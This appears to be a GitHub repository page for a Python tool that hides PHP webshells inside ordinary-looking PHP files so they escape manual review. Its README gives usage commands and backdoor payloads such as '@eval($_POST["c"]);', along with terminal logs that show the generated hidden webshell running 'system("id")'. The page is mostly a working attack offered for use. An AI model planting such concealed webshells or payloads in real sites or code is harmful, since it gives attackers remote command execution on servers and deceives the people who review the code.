Skip to content

Macr0phag3/webshell-bypassed-human

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

8 Commits
LICENSE
LICENSE
 
 
README.md
README.md
 
 
hide_webshell.py
hide_webshell.py
 
 
normal.php
normal.php
 
 
normal_pro.php
normal_pro.php
 
 
payload.txt
payload.txt
 
 
webshell_hidden.php
webshell_hidden.php
 
 

Repository files navigation

webshell-bypassed-human

见公众号文章:传送门 ,或者见 fb 文章 https://www.freebuf.com/articles/web/241454.html

过人 webshell 的生成工具

» python hide_webshell.py
usage: hide_webshell.py [-h] -pf PAYLOAD_FILE [--pro] [-wf WEBSHELL_FILE]
                        [--debug]
                        php
hide_webshell.py: error: the following arguments are required: php, -pf/--payload_file

将 payload 放在 -pf 所指定的路径

hide webshell

示例:

python hide_webshell.py hide_webshell.py normal.php -pf payload.txt

hide webshell pro

示例:

python hide_webshell.py normal_pro.php -pf payload.txt --pro

payload 示例

  • system("echo \"hacked by Tr0y :)\"");
  • @eval($_POST["c"]);

完整示例

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:27]
» cat payload.txt
system("echo \"hacked by Tr0y :)\"");%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:28]
» p hide_webshell.py normal.php -pf payload.txt && php webshell_hidden.php
[+] Hide webshell in normal mode
  [-] Get payload from payload.txt
      Payload is system("echo \"hacked by Tr0y :)\"");
  [-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:45:31]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php webshell_hidden.php
[+] Hide webshell in pro mode
  [-] Get payload from payload.txt
      Payload is system("echo \"hacked by Tr0y :)\"");
  [-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
hacked by Tr0y :)

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:23]
» cat payload.txt
@eval($_POST["c"]);%

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:24]
» p hide_webshell.py normal.php -pf payload.txt && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
[+] Hide webshell in normal mode
  [-] Get payload from payload.txt
      Payload is @eval($_POST["c"]);
  [-] Get php code from normal.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

# macr0phag3 in ~/Tr0y/webshell-bypassed-human on git:master ✖︎ [14:48:26]
» p hide_webshell.py normal_pro.php -pf payload.txt --pro && php -r '$_POST["c"]="system(\"id\");"; require("webshell_hidden.php");'
[+] Hide webshell in pro mode
  [-] Get payload from payload.txt
      Payload is @eval($_POST["c"]);
  [-] Get php code from normal_pro.php
[!] Saved webshell as webshell_hidden.php
[!] All done

Bye :)
uid=502(macr0phag3) gid=20(staff) groups=20(staff),12(everyone), ...此处省略

其他

Stargazers over time

About

过人 webshell 的生成工具

Resources

Readme

License

Apache-2.0 license
Activity

Stars

255 stars

Watchers

9 watching

Forks

38 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages